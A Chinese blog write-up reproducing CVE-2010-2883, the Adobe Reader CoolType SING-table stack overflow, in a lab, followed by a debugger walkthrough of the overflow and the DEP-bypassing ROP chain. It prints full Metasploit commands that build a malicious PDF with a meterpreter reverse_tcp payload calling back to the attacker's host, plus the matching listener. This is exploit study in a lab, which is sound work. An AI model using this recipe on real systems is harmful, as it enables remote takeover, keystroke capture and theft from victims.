CVE-2010-2883漏洞分析

最新推荐文章于 2023-02-14 19:47:53 发布
最新推荐文章于 2023-02-14 19:47:53 发布
阅读量1.1k 收藏 5
点赞数 1
分类专栏: 漏洞分析 文章标签: windows 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46286477/article/details/127052298
版权

CVE-2010-2883漏洞复现及分析

1.CVE-2010-2883漏洞原理:

Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当靶机打开恶意PDF文件时,可允许代码远程执行。

2.使用的练习环境

使用的靶机是 Windows XPx86 SP3(记得把防火墙关闭)
使用的攻击机器是kali;IP 是 192.168.109.130:8888(端口不用特意设置,使用时自动打开了)

3.使用渗透工具

使用工具:msfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。kali中就直接有,打开就可以用了。

4.漏洞利用的渗透过程及结果

首先使用kali终端输入msfconsole就可以打开了。
在这里插入图片描述

1.搜索Adobe渗透模块,  
msf 6> search adobe_cooltype_sing 

2.调用渗透模块,查看可以利用的方式
msf 6> use exploit/windows/fileformat/adobe_cooltype_sing/

在这里插入图片描述

1.调用meterpreter载荷,反向连接到渗透机  
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp

2.设置回连Kali Linux的IP地址 ,此Ip设置成kali的IP(可以通过ifconfig查看kali的IP)
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.109.130

3.设置本地监听端口  
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > set LPORT 8888

4.设置带有后门程序的PDF文件  
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > set FILENAME GeekFZ.pdf

5.执行渗透,生成PDF文件  
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > exploit

在这里插入图片描述

1.使用handler监听模块  
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > use exploit/multi/handler

2.回弹一个tcp连接  
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

3.设置监听IP地址(跟PDF木马文件回连IP一致)
msf6 exploit(multi/handler) > set LHOST 192.168.109.130

4.设置监听的端口(跟PDF木马文件回连端口一致) 
msf6 exploit(multi/handler) > set LPORT 8888

5.开启监听  
msf6 exploit(multi/handler) > exploit

在这里插入图片描述

将生成的文件,拖到靶机Xp中,打开恶意PDF文件。此时就可以利用CVE-2010-2883,成功远程控制靶机。

在这里插入图片描述

可以查看靶机的键盘输入、查看靶机的配置信息、对靶机进行截图等等操作。总之靶机已经被我控制了。

在这里插入图片描述在这里插入图片描述

5.漏洞复盘

5.1 漏洞基本信息

漏洞文件:低于9.3.4版本的Adobe Reader
漏洞函数:strcat()
漏洞对象:SING表的UniqueName成员
CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞,UniqueName字符串拷贝进栈中,并且不检查字符串长度。

5.2 栈溢出复盘

使用IDA打开CoolType.dll,通过字符串SING找到strcat。记录下地址0803DD74,一会去OD中复盘一下栈溢出。
在这里插入图片描述

+0x10位置便是UniqueName成员的地址。
在这里插入图片描述
来到地址0803DD74设置断点。按F9让pdf阅读器先运行初始化,然后打开用msf6生成的恶意pdf文件(运行过程中出现卡顿和报错是正常现象,不需要理会),在“SING”字符串的地址不远处找到strcat函数的调用,设置断点。
下图是动态分析strcat函数之前这段代码,其功能是检查pdf中是否包含SING表,并解析SING表,获取其UniqueName成员(再sing数据结构中+0x10的位置就是UniqueName成员)。
在这里插入图片描述
单步步过strcat函数,来到0x0803DDB0,数据跟随EBP,可以看到返回地址已经被覆盖为0x4A82A714。
在这里插入图片描述
来到地址0x4A82A714,设置断点运行过来。执行这两条指令的作用是将栈中跳转地址的下一地址的内容(此处为0x0C0C0C0C)赋值给esp,产生的作用等同于 mov esp,0x0C0C0C0C。
在这里插入图片描述
此时的栈顶指针esp被修改为0x0c0c0c0c,这时就将代码执行流引导至地址0x0C0C0C0C处。黄色框中是ROP链,用ROP技术可以绕过DEP。
在这里插入图片描述

继续跟进ROP链,会先后调用函数CreateFile 、CreateFileMapping、MapOfViewMap并且创建了文件iso885。将shellcode保存到文件夹,然后映射到内存中,进而得到执行。漏洞分析到这里就结束了,路漫漫其修远兮,吾将上下而求索。
在这里插入图片描述

6.参考文献

1.看雪优秀文章:https://hongtai-s.github.io/2021/06/27/cve-2010-2883/
2.bilibili:CVE-2010-2883解析

sea nine sun
关注
专栏目录
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2010-2883分析
weixin_41487541的博客
03-20 5005
一、漏洞描述 Adobe Reader 和 Acrobat 9.x 9.4 之前的 CoolType.dll 中基于堆栈的缓冲区溢出,以及 Windows 和 Mac OS X 8.2.5 之前的 8.x,允许远程攻击者执行任意代码或导致拒绝服务(应用程序崩溃)通过在 TTF 字体的 Smart INdependent Glyphlets (SING) 表中具有长字段的 PDF 文档。用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 二、漏洞复现 实验环境:Windows XP SP3虚拟机、
漏洞复现-CVE-2010-2883
滕财然的博客
02-26 1564
CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。 2、漏洞分析 反汇编工具IDA: IDA 是全球最智能、功能最完善的交互式反汇编程序,许多软件安全专家和黑客...
CVE-2010-2883漏洞分析到样本分析
qq_28205153的博客
08-19 5399
本文章将从漏洞利用分析开始,到样本分析结束,其中涉及到的知识点有PDF格式、TTF字体格式、缓冲区溢出漏洞利用、PE文件格式、软件脱壳和恶意代码分析。其中会演示一些基本操作,方便初学者进行复现。 前置知识 要学习本文章,需要下面的前置知识 C语言。可以看《C程序设计语言》。 汇编语言。可以看《深入理解计算机系统》第三章。 缓冲区溢出漏洞利用。可以看《0day安全:软件漏洞分析技术》。 软件脱壳、PE文件格式。可以看《加密与解密》。 恶意代码分析(可选)。可以看《恶意代码分析实战》。 漏洞信息 漏洞名称:
栈溢出CVE复现分析CVE-2010-2883
weixin_40306105的博客
05-03 956
1 实验环境 操作系统:XP SP3 调试器:OllyDbg 反汇编:IDA Pro 7.0 Adobe Reader : 9.3.4 2 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 3 实验内容 首先在系统中找到问题库文件,也就是xp sp3...
CVE-2018-2883漏洞利用程序msf
03-27
### CVE-2018-2883漏洞概述 CVE-2018-2883是一个针对Oracle WebLogic Server的安全漏洞,该漏洞属于远程代码执行(RCE)类型,允许攻击者通过发送恶意构造的数据包来执行任意代码。此漏洞影响了多个版本的WebLogic ...
CVE-2012-4969漏洞分析
02-29
总之,通过分析,可以得出结论:CVE-2012-4969漏洞是因为CMshtmlEd类对象在释放后,其指针被错误地再次使用所导致。这样的漏洞能够被利用来执行任意代码,造成严重的安全威胁。解决这类问题,通常需要软件厂商发布...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
字符拼接产生的安全漏洞
09-25
XSS全称(Cross Site Scripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。比如获取用户的Cookie,导航到恶意网站,携带木马等。
C语言中为什么认为strcat()函数不安全
最新发布
weixin_35757191的博客
02-14 1028
strcat() 函数在 C 语言中被认为是不安全的,因为它没有检查目标字符串的空间是否足够,以容纳源字符串。如果目标字符串的空间不足以容纳源字符串,则会导致缓冲区溢出,从而导致软件缺陷和安全漏洞。为了避免这些问题,建议使用安全的字符串函数,如 strncat() 和 strlcpy()。 ...
Adobe Reader 缓冲区溢出漏洞CVE-2010-2883漏洞分析报告
君子谬
11-28 2182
一. 简介   软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:
cve-2019-1821 思科 Cisco Prime 企业局域网管理器 远程代码执行 漏洞分析
whatday的专栏
08-25 922
前言 不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度。正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响。 这个漏洞存在于思科Prime Infrastructure项目,思科为其申请编号:CVE-2019-1821。因为我无法测试新补丁(我没有思科的证件),不清楚漏洞补丁的具体情况,因此我决定分享漏洞详情,希望有人可以验证补丁的稳定性。 TL;DR 在这篇文章我会讨论CVE-2019-1821的挖掘过程并演示攻击,该漏洞属于未经身份验证的服务器端远程代码执行漏洞
漏洞分析CVE-2010-2883(栈溢出)
4ct10n
07-02 3404
Adobe Acrobat和Reader都是美国Adobe公司开发的非常流行的PDF文件阅读器。 基于Window和Mac OS X的Adobe Reader和Acrobat 9.4之前的9.x版本,8.2.5之前的8.x版本的CoolType.dll中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有TTF字体Smart INdependent Glyphlets (SING)表格中超长字段的PDF文
Adobe Reader栈溢出漏洞(CVE-2010-2883)分析
鬼手的博客
06-08 2883
文章目录漏洞描述测试环境静态分析定位触发点分析漏洞成因动态调试获取SING表的入口地址溢出点精心挑选的返回地址JavaScript实现HeapSpray利用ROP链绕过DEP保护漏洞利用流程总结漏洞修复参考资料 这个漏洞是《漏洞战争》里面的第一个漏洞,也是我分析的第一个漏洞。水平有限,如有错误还望各位大佬指正。 漏洞描述 CVE-2010-2883是Adobe Reader和Acrobat中的Co...
利用CVE-2010-2883漏洞制作pdf马
sky
06-18 1289
利用CVE-2010-2883漏洞制作pdf马   msf > searchCVE-2010-2883    exploit/windows/browser/adobe_cooltype_sing     2010-09-07       great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow   exploit
一个利用 CVE-2010-2883 漏洞的样本的简要分析
weixin_30596165的博客
09-14 165
拿到一个 CVE-2010-2883 的样本: file md5: 68F74C7272BF25B3592F9E46997779E2 file size: 763,188 bytes 这是一个 PDF 文件,其中包含很多的 stream,前面的 FlateDecode 编码的 stream 基本上都是一样的。 最后一个是有害的 ttf 文件,下图是解码前的 stream 结构:...
Adobe阅读器漏洞(adobe_cooltype_sing)学习研究
weixin_30381793的博客
03-31 328
实验环境:Kali 2.0+Windows XP sp3+Adobe Reader 9.0.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。 参考资料:《Metasploit魔鬼训练营》p286-p298 Adobe漏洞渗透过程: kali上使用windows/fileforma...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值